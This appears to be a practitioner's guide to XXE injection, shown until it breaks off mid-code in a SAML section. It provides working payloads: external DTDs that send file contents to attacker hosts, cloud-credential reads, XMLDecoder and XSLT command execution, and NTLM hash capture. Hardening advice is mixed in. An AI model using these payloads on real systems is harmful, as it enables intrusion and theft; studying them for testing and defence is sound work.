Comprehensive XXE Guide

A practitioner’s reference for XML External Entity injection — fundamentals, parser quirks, in-band and out-of-band exfiltration, parameter entity chains, file-format vectors, real-world CVEs, tooling, and hardening. Compiled from 40 research sources.


Table of Contents

  1. Fundamentals
  2. Attack Surface & Entry Points
  3. Classic In-Band XXE
  4. Blind XXE via External DTD
  5. Error-Based XXE
  6. Parameter Entities & Local DTD Chains
  7. XXE → SSRF Pivoting
  8. XXE → File Read & Information Disclosure
  9. XXE → RCE
  10. Parser-Specific Behaviors
  11. XML File-Format Vectors
  12. WAF & Filter Bypasses
  13. Denial of Service
  14. Real-World CVEs & Chains
  15. Tooling
  16. Detection & Prevention
  17. Payload Quick Reference

1. Fundamentals

XXE (XML External Entity) injection occurs when an XML parser processes attacker-controlled input with DTD (Document Type Definition) and external entity resolution enabled. The parser treats SYSTEM identifiers as URIs, fetching and substituting their content into the document — yielding file read, SSRF, blind exfiltration, DoS, and in some stacks RCE.

Three classes:

Class | Description | Example
In-Band | Entity value reflected directly in the response | XML-to-JSON converters, stock-lookup APIs
Blind / OOB | No reflection; data exfiltrated via DNS/HTTP/FTP using an attacker-hosted DTD | SVG/DOCX processors, async workers
Error-Based | Content leaked through parser exception messages | Spring Boot 500 handlers, lxml XMLSyntaxError

Impact spectrum: DNS/HTTP callback → Arbitrary file read → Source code disclosure → Cloud metadata / IMDS token theft → Internal service enumeration → Credential capture (SMB hash) → Remote code execution (PHP expect, Java XMLDecoder, XSLT).

1.1 The XML DTD primer

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ELEMENT root ANY>
  <!ENTITY internal "literal value">
  <!ENTITY external SYSTEM "file:///etc/passwd">
  <!ENTITY % param  SYSTEM "http://attacker/evil.dtd">
]>
<root>&external;</root>
  • <!DOCTYPE …>: declares the document type and the internal subset.
  • <!ELEMENT …>: declares allowed element structure (rarely required).
  • <!ENTITY name "value">: general entity, referenced as &name; inside the document body.
  • <!ENTITY name SYSTEM "URI">: external general entity; the parser fetches the URI.
  • <!ENTITY % name …>: parameter entity, referenced as %name; inside the DTD only. It cannot appear inside the document body.
  • %name; inside the internal subset is the primitive behind blind and error-based XXE.
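A quick way to see the internal/external distinction in practice is Python's standard-library ElementTree, which wraps expat. In the sketch below (stdlib only; the two documents are the primer's entities split apart), the internal entity is expanded but the external one is never fetched: expat hands the unresolved reference back and ElementTree reports it as an error instead of returning file contents. That is one parser's default; section 10 covers parsers that do fetch.

```python
import xml.etree.ElementTree as ET

INTERNAL = """<!DOCTYPE root [
  <!ENTITY internal "literal value">
]>
<root>&internal;</root>"""

EXTERNAL = """<!DOCTYPE root [
  <!ENTITY external SYSTEM "file:///etc/passwd">
]>
<root>&external;</root>"""


def parse_text(doc: str):
    """Return the root element's text, or the parse error as a string."""
    try:
        return ET.fromstring(doc).text
    except ET.ParseError as exc:
        return f"ParseError: {exc}"


if __name__ == "__main__":
    print(parse_text(INTERNAL))  # literal value
    print(parse_text(EXTERNAL))  # a ParseError message, never the file contents
```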

1.2 Entity reference rules that matter for exploitation

  1. Entity references are not expanded inside a SYSTEM literal, so <!ENTITY x SYSTEM "http://host/?q=&y;"> cannot splice y’s value into the URL.
  2. Parameter entities (%x;) can be used to concatenate text into other declarations — the basis of the “evil.dtd” trick.
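  3. In the internal subset, a parameter-entity reference may appear only between markup declarations, never inside one (the XML spec’s “PEs in Internal Subset” constraint), hence external DTDs are used to host the indirection.
  4. When a document combines an internal subset with an external DTD, the internal subset is processed first and the first declaration of an entity wins, so an entity declared in the external (or local) DTD can be overridden from the internal subset. This is the key to local-DTD / error-based chains.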
  5. SYSTEM URIs may be file://, http://, https://, ftp://, gopher://, jar:, netdoc:, data:, php://…, expect://.

1.3 Why it’s still everywhere

  • XML is deep in legacy plumbing (SOAP, SAML, WS-Security, XMPP, RSS/Atom, Office Open XML, SVG, XLIFF, XMP, RDF, PDF metadata, Kubernetes API fallback, Android app processing).
  • Many parsers still default to permissive DTD handling (libxml2 with LIBXML_DTDLOAD | LIBXML_NOENT, Java SAX/DOM prior to JDK 13 hardening, .NET Framework 4.5.1 and earlier, old Nokogiri).
  • “JSON only” APIs often accept XML via Content-Type: application/xml or text/xml as an undocumented fallback — valuable injection points.
  • File-format fuzzers routinely uncover XXE in image/document processors that unzip Office documents behind the scenes.

2. Attack Surface & Entry Points

2.1 Request-level sinks

Category | Examples
XML request bodies | Content-Type: application/xml, text/xml, application/soap+xml, application/xliff+xml
JSON → XML conversion | APIs that accept both; toggle Content-Type: application/xml on a JSON endpoint
SOAP / WS-* endpoints | Legacy integrations, admin APIs, invoice/billing, enterprise middleware
SAML SSO | SAMLResponse, AuthnRequest, IdP metadata upload
RSS / Atom feeds | “Import feed”, link preview, social aggregators
File uploads | SVG avatars, DOCX/XLSX/PPTX importers, XMP images, EPUB, XLIFF, XFA PDF forms
XInclude points | Server-side XML templating where the DOCTYPE can’t be controlled but XML fragments can
Webhook / CI | XML build manifests, Maven POM, Gradle module metadata, .csproj, .xib, .storyboard
Printer / orchestration APIs | JMF (Job Messaging Format) on port 4004, XFDF, Xerox FreeFlow
SCADA / industrial | Batch job XML, OPC UA fallback, manufacturing execution systems

2.2 Code-level sinks

Java     javax.xml.parsers.DocumentBuilderFactory / SAXParserFactory
         javax.xml.transform.TransformerFactory
         javax.xml.validation.SchemaFactory
         javax.xml.stream.XMLInputFactory
         javax.xml.xpath.XPathFactory
         java.beans.XMLDecoder          -- deserialization → RCE
         org.jdom2.input.SAXBuilder
         org.dom4j.io.SAXReader
.NET     System.Xml.XmlDocument (with XmlUrlResolver)
         System.Xml.XmlTextReader       -- pre-4.5.2 defaults dangerous
         System.Xml.XmlReader + XmlReaderSettings { DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }
         System.Xml.XPath.XPathDocument
         System.Xml.Linq.XDocument (pre-4.5.2)
         System.Xml.Serialization.XmlSerializer
Python   xml.etree.ElementTree          -- does not resolve external entities or fetch DTDs; bomb resistance depends on expat (2.4.1+)
         lxml.etree (libxml2)           -- parameter-entity XXE until 5.4.0
         xml.dom.minidom
         xml.sax
         xmltodict                      -- wraps expat
PHP      libxml (SimpleXMLElement, DOMDocument, XMLReader)
         -- LIBXML_NOENT enables entity substitution (dangerous)
Ruby     Nokogiri                       -- DTDLOAD/NOENT opt-in required
         REXML                          -- XML bomb protection, still resolves ENTITY
Node.js  libxmljs, xml2js (with explicitArray/DOCTYPE allowed), xmldom, fast-xml-parser
Go       encoding/xml                   -- does not resolve SYSTEM, generally safe

2.3 Content-Type smuggling

If a POST endpoint accepts JSON, try swapping the body:

POST /api/order HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://collab/xxe">]>
<order><item>&x;</item></order>

Burp extension Content Type Converter automates the JSON→XML flip.
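The flip itself is mechanical. Here is a rough sketch of what such a converter does, assuming a naive mapping where object keys become elements, arrays repeat the key, and scalars become text. Real frameworks each map JSON to XML their own way, so treat the output only as a first guess at the element names the endpoint expects. The root tag name is an assumption.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(body: str, root_tag: str = "root") -> str:
    """Naively convert a JSON object body into an XML string for Content-Type testing."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object at the top level")

    def build(parent: ET.Element, key: str, value) -> None:
        if isinstance(value, list):
            for item in value:  # arrays: repeat the element once per item
                build(parent, key, item)
            return
        child = ET.SubElement(parent, key)  # assumes keys are valid XML names
        if isinstance(value, dict):
            for k, v in value.items():
                build(child, k, v)
        elif value is not None:
            child.text = str(value)

    root = ET.Element(root_tag)
    for key, value in data.items():
        build(root, key, value)
    return ET.tostring(root, encoding="unicode")
```

For example, json_to_xml('{"item": "abc"}', "order") returns <order><item>abc</item></order>. You can then prepend the DOCTYPE from the request above.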


3. Classic In-Band XXE

When the parser reflects the entity value in the HTTP response, file disclosure is one request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&file;</productId>
  <storeId>1</storeId>
</stockCheck>

When the parser rejects undeclared elements, add an ANY declaration:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ELEMENT stockCheck ANY>
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&file;</productId>
</stockCheck>

3.1 XInclude — DOCTYPE-less injection

Useful when the server builds the outer XML and only lets you inject a small fragment (e.g. a productId field that is inlined into a SOAP envelope):

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Requires an XInclude-aware parser. In Java: DocumentBuilderFactory.setNamespaceAware(true) plus setXIncludeAware(true), or XOM/dom4j defaults.
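Python's standard library shows that XInclude is a separate, opt-in processing step. xml.etree.ElementInclude only expands xi:include when include() is called explicitly, and its default loader opens href as a plain filesystem path (not a file:// URL). A sketch with hypothetical helper names; fragment() rebuilds the injected element above around a local path.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def expand_xinclude(xml_text: str) -> ET.Element:
    """Parse, then explicitly run XInclude processing on the tree.

    ElementTree never acts on xi:include by itself; the expansion below only
    happens because ElementInclude.include() is called.
    """
    root = ET.fromstring(xml_text)
    ElementInclude.include(root)  # default loader: open(href) on the local filesystem
    return root


def fragment(path: str) -> str:
    """The injected fragment from above, with href pointing at a local path."""
    return (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include parse="text" href="{path}"/>'
        "</foo>"
    )
```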

3.2 Directory listing (Java file:// quirk)

libxml2 and the Java file: URL handler list directory contents when the URI points at a folder:

<!DOCTYPE r [<!ENTITY dir SYSTEM "file:///etc/">]>
<r>&dir;</r>

Java returns a newline-separated listing; libxml2 returns a text rendering. Use for filesystem enumeration before switching to targeted reads.


4. Blind XXE via External DTD

No reflection? Force the parser to fetch an attacker-hosted DTD and chain parameter entities.

4.1 Step 1 — prove external connectivity

<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY % ping SYSTEM "http://collab.example/"> %ping;]>
<r/>

If the Burp Collaborator / interact.sh receives a hit, the parser resolves parameter entities and will fetch remote DTDs.

4.2 Step 2 — chain a parameter entity for OOB exfil

Hosted at http://attacker/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker/x?d=%file;'>">
%eval;
%exfil;

Victim payload:

<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY % xxe SYSTEM "http://attacker/evil.dtd"> %xxe;]>
<r/>

Flow: the victim parser fetches evil.dtd → defines %file → %eval builds %exfil dynamically → %exfil makes an HTTP GET with the file contents in the query string.
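On the receiving end, the file contents arrive as the d parameter of a GET for /x. Below is a minimal sketch for pulling them out of a logged request target. It assumes the d parameter name from the evil.dtd above; any HTTP server that logs full request lines can act as the listener. The function name is hypothetical.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def extract_exfil(request_target: str, param: str = "d") -> Optional[str]:
    """Return the (URL-decoded) value of `param` from a request target like /x?d=..."""
    query = urlsplit(request_target).query
    values = parse_qs(query, keep_blank_values=True).get(param)
    return values[0] if values else None
```

For example, extract_exfil("/x?d=a&b=c") returns "a". A file containing & (or #) is cut short in transit, which is one reason 4.3 moves to FTP and 8.3 to base64.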

4.3 FTP for multi-line files

HTTP URL parsers strip newlines. For files like /etc/passwd use FTP, where the file contents ride as the password in the URI:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'ftp://a:%file;@attacker/x'>">
%all;
%send;

Pair with a dummy FTP listener (e.g. ONsec xxe-ftp-server.rb) that answers just enough of the FTP dialogue to capture and log what the client sends, including the PASS command.

4.4 Gopher (legacy Java ≤ 1.7)

<!ENTITY % send SYSTEM "gopher://attacker:1337/?%file;">

Effectively extinct in modern deployments but still useful on embedded Java or ancient appliances.

4.5 DNS-only exfiltration

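When only outbound DNS is allowed, encode one file-byte per subdomain via iterative XXE or use a tool like XXEinjector to chunk. For simple fingerprinting a bare DNS lookup is enough. Use a unique label per probe (probe-1 below is a placeholder). The parser resolves the hostname literally and will not evaluate shell syntax such as $(id):

<!ENTITY % p SYSTEM "http://probe-1.dns.attacker.tld/"> %p;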

5. Error-Based XXE

Used when OOB is blocked (egress filtered) but the app surfaces parser errors.

5.1 External-DTD error variant

<!-- evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

The parser tries to open file:///nonexistent/<contents of /etc/passwd>, fails, and embeds the missing-path string in the exception thrown back to the client.
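Pulling the leaked text back out of the error is simple string work. The sketch below assumes the message echoes the failing path in one of two illustrative shapes: a libxml2-style failed to load external entity "file:///nonexistent/…", or a Java-style FileNotFoundException: /nonexistent/… (No such file or directory). Real messages vary by parser and framework and may be truncated. The helper name is hypothetical.

```python
from typing import Optional


def extract_leak(error_text: str, marker: str = "/nonexistent/") -> Optional[str]:
    """Return whatever the parser echoed after the bogus directory prefix."""
    start = error_text.find(marker)
    if start == -1:
        return None
    leaked = error_text[start + len(marker):]
    # Trim an assumed trailer: a closing quote (libxml2-style) or
    # " (No such file ..." (Java-style). rfind keeps quotes inside the data.
    for trailer in ('"', " (No such file"):
        cut = leaked.rfind(trailer)
        if cut != -1:
            return leaked[:cut]
    return leaked
```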

5.2 Purely local (no egress) — local DTD trick

PortSwigger / Arseniy Sharoglazov’s technique: find a DTD that already exists on the server filesystem whose entities can be redefined from the internal subset.

Canonical example (GNOME yelp):

<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<r/>

%ISOamso; is redefined to inject additional declarations; when %local_dtd; is expanded the injected entities fire and produce the error.

Other high-hit local DTDs (see GoSecure dtd-finder for full list):

PathOverridable entity
/usr/share/yelp/dtd/docbookx.dtdISOamso
/usr/share/xml/fontconfig/fonts.dtdconstant
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtdvarious
/opt/IBM/WebSphere/AppServer/properties/schemas/j2ee/XMLSchema.dtdWebSphere
/usr/share/java/xalan2.jar!/org/apache/xalan/res/XSLTInfo.propertiesXalan
C:\Windows\System32\wbem\xml\cim20.dtdWindows

Brute-force the DTD path with Intruder using the dtd_files.txt wordlist from the GoSecure repo.

5.3 GoSecure dtd-finder

java -jar dtd-finder.jar /path/to/docker-image.tar

Scans a tarball/Docker image for DTDs and automatically identifies entities that can be overridden. Point at the target’s base image to build a custom payload list.
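For a rough first pass without the tool, the core idea can be approximated in a few lines. Walk an extracted filesystem (for example, an unpacked image export) and list the parameter entities that each .dtd both declares and references. This is a simplification, not dtd-finder's actual algorithm. It does not check whether overriding the entity yields a usable injection point, so treat the output as candidates to test. The function name is hypothetical.

```python
import os
import re
from typing import Dict, List

# Parameter-entity declarations: <!ENTITY % name ...
_PE_DECL = re.compile(r"<!ENTITY\s+%\s+([\w.:-]+)")


def find_overridable_entities(root_dir: str) -> Dict[str, List[str]]:
    """Map each .dtd path to parameter entities it declares AND later references (%name;)."""
    found: Dict[str, List[str]] = {}
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:
            if not name.lower().endswith(".dtd"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            declared = set(_PE_DECL.findall(text))
            referenced = sorted(n for n in declared if f"%{n};" in text)
            if referenced:
                found[path] = referenced
    return found
```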


6. Parameter Entities & Local DTD Chains

Understanding the parameter-entity gymnastics is essential because almost every advanced XXE variant boils down to:

  1. Define %file that reads the target.
  2. Define %eval that — when expanded — declares a third entity whose URI concatenates %file’s value.
  3. Expand %eval, then expand the generated entity.

6.1 Character-reference encoding

Because % and & inside the internal subset are parsed immediately, you must delay their evaluation. Use character references:

Literal | Delayed form
% | &#x25;
& | &#x26;
&#x25; (one more level) | &#x26;#x25;

Rule of thumb: each layer of delayed expansion adds one more &#x26; wrap.
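The rule of thumb can be written as a one-line transformation. In this sketch (the helper name delay is hypothetical), & is escaped first and % second, so the &#x25; sequences produced for % are not re-escaped within the same layer. Applying it twice to % yields the &#x26;#x25; form from the table. Quotes inside nested literals still need &#x27; or &#x22;, as in 4.2.

```python
def delay(markup: str) -> str:
    """Add one layer of deferred expansion to DTD markup."""
    # Escape & before %: otherwise the '&' of a fresh '&#x25;' would be
    # escaped again in the same call, adding two layers at once.
    return markup.replace("&", "&#x26;").replace("%", "&#x25;")
```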

6.2 Double-encoded payload template

<!ENTITY % outer '
  <!ENTITY &#x25; file   SYSTEM "file:///flag">
  <!ENTITY &#x25; wrap   "<!ENTITY &#x26;#x25; leak SYSTEM &#x27;http://a/?x=&#x25;file;&#x27;>">
  &#x25;wrap;
  &#x25;leak;
'>
%outer;

6.3 lxml “meow://” trick (libxml2 parameter-entity leak before lxml 5.4.0)

Before lxml 5.4.0, settings such as resolve_entities=False blocked ordinary external entities, but general entities built from parameter entities still leak via a bogus scheme:

<!DOCTYPE colors [
  <!ENTITY % a '
    <!ENTITY % file SYSTEM "file:///tmp/flag.txt">
    <!ENTITY % b "<!ENTITY c SYSTEM &#x27;meow://%file;&#x27;>">
  '>
  %a; %b;
]>
<colors>&c;</colors>

The parser reports failed to load external entity "meow://FLAG{secret}" — flag in error message, no egress needed.

Fixed in lxml ≥ 5.4.0 and libxml2 ≥ 2.13.8. Either alone is not sufficient.


7. XXE → SSRF Pivoting

Every XXE is an SSRF primitive. The http:// scheme inside a SYSTEM URI forces the server to issue an outbound request.

7.1 Cloud metadata exfil

AWS (IMDSv1):

<!ENTITY aws SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

GCP:

<!ENTITY gcp SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">

Note: GCP IMDS requires Metadata-Flavor: Google header — XXE typically can’t set request headers, so GCP is usually a dead end unless the parser uses a custom HTTP client that forwards request headers.

Azure IMDS:

<!ENTITY az SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">

Azure also requires Metadata: true header — usually blocked, same caveat as GCP.

IMDSv2 on AWS requires a PUT to get a token — blocks naive XXE. If the backend still permits IMDSv1 via HttpTokens=optional, exploitation stays trivial.

7.2 Internal port scan / service enumeration

Error/response timing differences reveal open vs closed ports:

<!ENTITY scan SYSTEM "http://10.0.0.5:6379/">

Redis/Memcached/Elasticsearch without auth can sometimes be driven via gopher smuggling, though XXE alone lacks CRLF control.

7.3 JMF / print orchestration (Xerox FreeFlow Core)

Real case: a JMF listener on TCP/4004 parsed XML without hardening. A crafted JMF DOCTYPE with a SYSTEM entity caused the server to issue outbound HTTP, confirming SSRF. Chained with a subsequent path traversal, it led to unauthenticated RCE.

<?xml version="1.0"?>
<!DOCTYPE JMF [<!ENTITY probe SYSTEM "http://collab/oob">]>
<JMF SenderID="t" Version="1.3"><Query Type="KnownMessages">&probe;</Query></JMF>

8. XXE → File Read & Information Disclosure

8.1 High-value target files (Linux)

/etc/passwd               /etc/shadow (rarely readable)
/etc/hosts /etc/resolv.conf
/proc/self/environ        env vars, often contain secrets & tokens
/proc/self/cmdline        full process command line
/proc/self/cwd/<file>     relative-path access
/proc/self/net/tcp        open sockets
/proc/self/status
/proc/version /etc/issue  fingerprinting
/proc/1/maps              memory mappings
/root/.ssh/id_rsa /root/.aws/credentials  if root-run
/var/lib/kubelet/config.yaml
/run/secrets/kubernetes.io/serviceaccount/token

8.2 Windows

C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Windows\System32\inetsrv\config\applicationHost.config
file:////attacker/share/a.jpg     → NetNTLMv2 hash capture via Responder

8.3 Binary & non-ASCII file read

Raw file:// breaks on non-XML-safe bytes. Wrap in base64 via PHP filter:

<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">

Java: wrap the read inside a CDATA block via a two-stage entity construction (XXEinjector --cdata mode).

8.4 Source code recovery

PHP filters cover the filesystem; combine with .git/config, .svn/wc.db, composer.json, framework configs to rebuild source trees.


9. XXE → RCE

9.1 PHP expect:// wrapper

If the expect extension is loaded:

<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]>
<r>&x;</r>

Rare in the wild — pecl expect is almost never deployed — but still worth testing when PHP fingerprint is confirmed.

9.2 Java XMLDecoder deserialization

java.beans.XMLDecoder.readObject() processes XML that instantiates arbitrary classes. If an app exposes it to user input, it’s instant RCE (not strictly XXE but frequently conflated because the entry point is XML).

<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <array class="java.lang.String" length="3">
        <void index="0"><string>/bin/sh</string></void>
        <void index="1"><string>-c</string></void>
        <void index="2"><string>id &gt; /tmp/p</string></void>
      </array>
    </void>
  </object>
</java>

Real CVE targets: Oracle WebLogic CVE-2017-10271, Restlet XMLDecoder endpoints.

9.3 XSLT → Java RCE via Xalan

If you can control a stylesheet (or feed XSLT to a Transformer):

<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
  xmlns:str="http://xml.apache.org/xalan/java/java.lang.String">
  <xsl:template match="/">
    <xsl:variable name="cmd">touch /tmp/pwn</xsl:variable>
    <xsl:variable name="rt" select="rt:getRuntime()"/>
    <xsl:variable name="p"  select="rt:exec($rt,$cmd)"/>
  </xsl:template>
</xsl:stylesheet>

Default-enabled on Java’s Xalan until JDK 15 introduced jdk.xml.enableExtensionFunctions=false.

9.4 jar: protocol → file-write → RCE chain

Java’s jar:http://… handler downloads a ZIP to /tmp/…, extracts it, reads a member, then deletes the archive. Hanging the HTTP server indefinitely keeps the temp file alive. Combined with a second vulnerability (LFI, template injection, deserialization, XSLT upload) this yields RCE.

<!ENTITY x SYSTEM "jar:http://attacker:8080/evil.zip!/marker.txt">

Workshop tooling: slow_http_server.py / slowserver.jar from GoSecure xxe-workshop.

9.5 NetNTLMv2 capture (Windows)

<!ENTITY x SYSTEM "file:////attacker/share/a.jpg">

Run Responder.py -I eth0 on the attacker host to answer the SMB connection, capture the NetNTLMv2 hash, and crack it with hashcat -m 5600.


10. Parser-Specific Behaviors

10.1 libxml2 (PHP, Python lxml, Ruby Nokogiri, many C/C++ apps)

  • External entity resolution is off by default since 2.9.0 unless LIBXML_NOENT or LIBXML_DTDLOAD is set.
  • PHP’s libxml_disable_entity_loader(true) was the historical fix (deprecated in PHP 8).
  • Parameter-entity expansion continued even with “safe” settings until 2.13.8.
  • Directory listing via file:///etc/ supported.

10.2 Xerces (Java SAX/DOM)

  • DocumentBuilderFactory / SAXParserFactory still default to entity resolution enabled unless features explicitly disabled.
  • Hardening flags (disallow-doctype-decl alone blocks DOCTYPE-based XXE; set the rest as defence in depth, or when DOCTYPEs must be accepted):
    • http://apache.org/xml/features/disallow-doctype-decl = true (best defence)
    • http://xml.org/sax/features/external-general-entities = false
    • http://xml.org/sax/features/external-parameter-entities = false
    • http://apache.org/xml/features/nonvalidating/load-external-dtd = false
    • FEATURE_SECURE_PROCESSING = true
    • setXIncludeAware(false); setExpandEntityReferences(false)
  • TransformerFactory, SchemaFactory, XPathFactory, Validator, SAXTransformerFactory each need independent hardening via ACCESS_EXTERNAL_DTD / ACCESS_EXTERNAL_STYLESHEET / ACCESS_EXTERNAL_SCHEMA.

10.3 .NET

API | Default (pre-4.5.2) | Default (4.5.2+)
XmlDocument | XmlUrlResolver present: vulnerable | XmlResolver = null: safe
XmlTextReader | ProhibitDtd = false: vulnerable | DtdProcessing = Prohibit: safe
XmlReader (via XmlReader.Create) | DtdProcessing = Prohibit: safe | safe
XPathDocument | dangerous | fixed
XDocument / XElement | uses XmlReader internally: generally safe | safe

Always dangerous regardless of version: setting XmlResolver = new XmlUrlResolver() or DtdProcessing = Parse with non-null resolver.

Look for these patterns in C# code review:

var rdr = new XmlTextReader(input);
rdr.XmlResolver = new XmlUrlResolver();           // BAD
rdr.DtdProcessing = DtdProcessing.Parse;          // BAD

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Parse,          // BAD
    XmlResolver  = new XmlUrlResolver(),          // BAD
    MaxCharactersFromEntities = 0                 // enables unbounded billion-laughs
};

Java counterpart, for contrast: CVE-2025-27136 in the LocalS3 Java S3 emulator used a default DocumentBuilderFactory on the CreateBucketConfiguration endpoint, letting unauthenticated attackers read /etc/passwd.

10.4 Python lxml

  • Safe mode: etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True).
  • Parameter-entity XXE viable before lxml 5.4.0 / libxml2 2.13.8, even with resolve_entities=False, when load_dtd=True.
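  • defusedxml provides hardened drop-in replacements for the stdlib XML modules (defuse_stdlib() monkey-patches them; its lxml wrapper is deprecated). By default it forbids entity declarations and external references; forbid_dtd=True rejects DOCTYPE entirely. Recommended.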

10.5 Nokogiri (Ruby)

  • Safe by default. Dangerous only when DTDLOAD | NOENT passed:
    Nokogiri::XML(input) { |c| c.dtdload.noent }   # BAD
    
  • REXML::Document — inherits from ruby-stdlib; patches since 2013 cap recursion but general entities still expand.

10.6 Go encoding/xml

  • Does not resolve SYSTEM entities. Historically considered safe.
  • Custom decoders (etree, html-xml-tools) can still be coaxed to fetch DTDs — review any third-party XML lib on Go.

11. XML File-Format Vectors

Any file whose internals contain XML is an XXE delivery vehicle.

11.1 SVG (file upload)

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="200">
  <text>&x;</text>
</svg>

Or <image xlink:href="file:///etc/hostname"/>. Works against ImageMagick (prior to policy.xml hardening), librsvg, Inkscape, Apache Batik, many cloud image processors.

11.2 Office Open XML (DOCX, XLSX, PPTX)

  1. unzip foo.docx -d foo/
  2. Edit foo/word/document.xml (or xl/workbook.xml) — insert <!DOCTYPE …> with payload between the XML prolog and the root element.
  3. cd foo && zip -r ../evil.docx .
  4. Upload to the target’s document-processing feature (resume parsers, invoice ingest, doc-to-PDF).
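The same ZIP structure that makes the steps above trivial also lets a receiving service cheaply check for DOCTYPEs before handing parts to an XML parser. Below is a minimal stdlib sketch covering OOXML, EPUB and ODF containers (the suffix list and function name are assumptions). It is a tripwire with known gaps: a DOCTYPE beyond the first 64 KiB or in an unusual encoding slips through. It is not a substitute for a hardened parser (16.2).

```python
import io
import zipfile
from typing import List

XML_SUFFIXES = (".xml", ".rels", ".opf", ".xhtml", ".svg")
# UTF-8/ASCII plus both UTF-16 byte orders, since a re-encoded part hides the ASCII form.
NEEDLES = (
    b"<!DOCTYPE",
    "<!DOCTYPE".encode("utf-16-le"),
    "<!DOCTYPE".encode("utf-16-be"),
)


def parts_with_doctype(archive: bytes, head_bytes: int = 64 * 1024) -> List[str]:
    """List XML-like members of a ZIP container that appear to declare a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(XML_SUFFIXES):
                continue
            with zf.open(info) as member:
                head = member.read(head_bytes)  # bounded read: never inflate whole members
            if any(needle in head for needle in NEEDLES):
                flagged.append(info.filename)
    return flagged
```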

11.3 XLIFF (translation files)

XLIFF consumers include Apache Tika, Okapi, and XLIFF Toolbox. Example that worked against a Java 1.8 parser:

<?xml version="1.0"?>
<!DOCTYPE XXE [<!ENTITY % remote SYSTEM "http://attacker/evil.dtd"> %remote;]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"/>

11.4 PDF (XFA forms, XMP metadata)

Acrobat XFA forms wrap XML; PDF metadata (/Metadata stream) carries an XMP packet. Many server-side PDF handlers (iText, PDFBox, Ghostscript) parse these.

11.5 EPUB, ODF

EPUB is a ZIP containing XHTML + OPF XML. ODF (LibreOffice) is a ZIP of content.xml / styles.xml. Both have historical XXE CVEs in reader software.

11.6 SVG / MathML embedded in HTML

If an HTML sanitizer passes SVG through unchanged and a later stage parses it with an XML parser, XXE is reachable even when the primary input is HTML.

11.7 SOAP envelopes

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <foo><![CDATA[<!DOCTYPE d [<!ENTITY % r SYSTEM "http://a/e.dtd"> %r;]><d/>]]></foo>
  </soap:Body>
</soap:Envelope>

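This only reaches a parser if the service extracts the element’s text and parses it as XML a second time. The CDATA wrapper keeps the payload opaque to the outer parse and to sanitizers that inspect the envelope, which sometimes bypasses outer sanitization.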

11.8 SAML

SAMLResponse XML is base64-encoded before transport — decode, inject DOCTYPE, re-encode. Signature validation may invalidate the payload unless the IdP-trust relationship allows a re-signed document; however many SPs parse the XML before signature verification (classic XSW-style bugs), making XXE trivially reachable.
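The decode/inject/re-encode step is a few lines. This sketch assumes the HTTP-POST binding, where SAMLResponse is plain base64 with no DEFLATE; the result still has to be URL-encoded into the form body. The doctype argument is whatever payload is being tested, and the function name is hypothetical.

```python
import base64


def inject_doctype(saml_response_b64: str, doctype: str) -> str:
    """Decode a base64 SAMLResponse, place `doctype` after any XML declaration, re-encode."""
    xml = base64.b64decode(saml_response_b64).decode("utf-8")
    if xml.startswith("<?xml"):
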